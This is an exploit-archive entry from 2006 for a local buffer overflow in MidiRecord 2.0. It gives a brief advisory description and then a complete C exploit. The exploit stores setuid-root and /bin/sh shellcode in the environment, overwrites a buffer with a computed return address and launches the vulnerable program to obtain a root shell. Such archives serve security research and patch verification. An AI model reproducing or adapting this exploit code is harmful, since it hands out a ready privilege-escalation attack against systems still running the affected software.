MidiRecord2 MidiRecord.CC - Local Buffer Overflow

2006-07-27T00:00:00
ID EXPLOITPACK:E06150C2CDDE67DE60AAE439180B82C8
Type exploitpack
Reporter Dedi Dwianto
Modified 2006-07-27T00:00:00

Description

MidiRecord2 MidiRecord.CC - Local Buffer Overflow

                                        
                                            // source: https://www.securityfocus.com/bid/19190/info

Midirecord is prone to a local buffer-overflow vulnerability because it fails to do proper bounds checking on user-supplied data before using it in a finite-sized buffer.

An attacker can exploit this issue to execute arbitrary code in the context of the victim running the affected application. 

Version 2.0 is vulnerable to this issue; other versions may also be affected.

* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
        char shellcode[]=
                "\x6a\x17\x58\x31\xdb\xcd\x80"
                "\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

        if(argc < 2)
                 {
           fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
             return 0;
             }
        char *env[] = {shellcode, NULL};
        char buf[BUFSIZE];
                int i;
                int *ap = (int *)(buf + ALIGNMENT);
                int ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

                for (i = 0; i < BUFSIZE - 4; i += 4)
                *ap++ = ret;
                execle(argv[1], "/dev/midi1", buf, NULL, env);

}